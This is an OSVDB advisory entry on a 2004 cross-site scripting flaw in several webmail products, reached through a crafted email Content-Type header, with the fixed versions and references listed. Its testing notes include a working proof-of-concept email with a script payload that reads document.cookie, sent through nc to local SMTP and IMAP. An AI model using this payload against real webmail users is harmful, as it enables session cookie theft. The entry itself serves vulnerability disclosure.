Multiple Webmail mime.php Content-Type XSS

2004-05-29T03:57:33
ID OSVDB:6514
Type osvdb
Reporter Román Medina-Heigl Hernández(roman@rs-labs.com)
Modified 2004-05-29T03:57:33

Description

Vulnerability Description

Multiple Webmail products contain a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate Content-Type upon submission to the mime.php script (or whatever script controls header content-type). This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

An upgrade is required to fix this vulnerability. Upgrade to the following versions depending on the product:

Squirrelmail: 1.4.3 or 1.5.1 IMP: 3.2.4 OpenWebmail: 2.40 IlohaMail: 0.8.13 Sqwebmail: 4.0.5 BasiliX: 1.1.1_fix1

Short Description

Multiple Webmail products contain a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate Content-Type upon submission to the mime.php script (or whatever script controls header content-type). This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

Testing with UW IMAP:

roman@rs-labs:~/squirrel/bug-new$ cat XSS-PoC-Squirrelmail.withquotes helo rs-labs-r0cks mail from:<evil@microsoft.com> rcpt to:<squirrel@rs-labs> data From: Attacker <evil@microsoft.com> To: roman@rs-labs.com Subject: Squirrelmail XSS PoC (without quotes) Date: Sun, 09 May 2004 22:39:58 +0200 Message-ID: <fm5t90tbzeglvqso0hc3j9u3doqc6sj5r5@4ax.com> X-Mailer: RoMaNSoFt's preferred one :-) MIME-Version: 1.0 Content-Type: application/octet-stream"<script>window.alert(document.cookie)</script>"; name=top_secret.pdf Content-Transfer-Encoding: base64 Content-Description: Not really top secret... (without quotes) Content-Disposition: attachment; filename=top_secret.pdf

JVBERi0xLjMKJeLjz9MKMSAwIG9iago8PAovTGVuZ3RoIDEyMTUKL0ZpbHRlciBbL0ZsYXRlRGVj dHhyZWYKNDY2MjUKJSVFT0YK . quit roman@rs-labs:~/squirrel/bug-new$ nc localhost 25 < XSS-PoC-Squirrelmail.withquotes 220 rs-labs ESMTP Exim 3.36 #1 Sun, 23 May 2004 22:52:24 +0200 250 rs-labs Hello localhost [127.0.0.1] 250 <evil@microsoft.com> is syntactically correct 250 <squirrel@rs-labs> verified 354 Enter message, ending with "." on a line by itself 250 OK id=1BRzxI-0006KA-00 221 rs-labs closing connection roman@rs-labs:~/squirrel/bug-new$ nc localhost 143 < imap * OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS STARTTLS AUTH=LOGIN] localhost IMAP4rev1 2003.339 at Sun, 23 May 2004 22:52:26 +0200 (CEST) 0 OK [CAPABILITY IMAP4REV1 IDLE NAMESPACE MAILBOX-REFERRALS BINARY UNSELECT SCAN SORT THREAD=REFERENCES THREAD=ORDEREDSUBJECT MULTIAPPEND] User squirrel authenticated * 1 EXISTS * 1 RECENT * OK [UIDVALIDITY 1084621844] UID validity status * OK [UIDNEXT 10] Predicted next UID * FLAGS (\Answered \Flagged \Deleted \Draft \Seen) * OK [PERMANENTFLAGS ()] Permanent flags * OK [UNSEEN 1] first unseen message in /var/mail/squirrel 0 OK [READ-ONLY] EXAMINE completed * SEARCH 1 0 OK SEARCH completed * 1 FETCH (BODYSTRUCTURE ("APPLICATION" {60} OCTET-STREAM"<SCRIPT>WINDOW.ALERT(DOCUMENT.COOKIE)</SCRIPT>" ("NAME" "top_secret.pdf") NIL "Not really top secret... (without quotes)" "BASE64" 104 NIL ("ATTACHMENT" ("FILENAME" "top_secret.pdf")) NIL NIL)) 0 OK FETCH completed * BYE rs-labs IMAP4rev1 server terminating connection 0 OK LOGOUT completed roman@rs-labs:~/squirrel/bug-new$

References:

Vendor URL: http://www.squirrelmail.org/ Vendor URL: http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt Vendor URL: http://www.squirrelmail.org/changelog.php Vendor Specific Advisory URL Vendor Specific Advisory URL Security Tracker: 1010425 Security Tracker: 1010341 Secunia Advisory ID:11870 Secunia Advisory ID:12289 Secunia Advisory ID:11778 Secunia Advisory ID:11875 Secunia Advisory ID:11805 Secunia Advisory ID:11884 Secunia Advisory ID:11734 Other Advisory URL: http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-2.txt Other Advisory URL: http://www.horde.org/imp/3.2/ Other Advisory URL: http://security.gentoo.org/glsa/glsa-200406-11.xml Other Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000858 Other Advisory URL: http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt Other Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200406-08.xml Mail List Post: http://marc.theaimsgroup.com/?l=full-disclosure&m=108588315114441&w=2 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-06/0050.html ISS X-Force ID: 16357 ISS X-Force ID: 16285 CVE-2004-0520 CVE-2004-0584 Bugtraq ID: 10450 Bugtraq ID: 10501 Bugtraq ID: 10439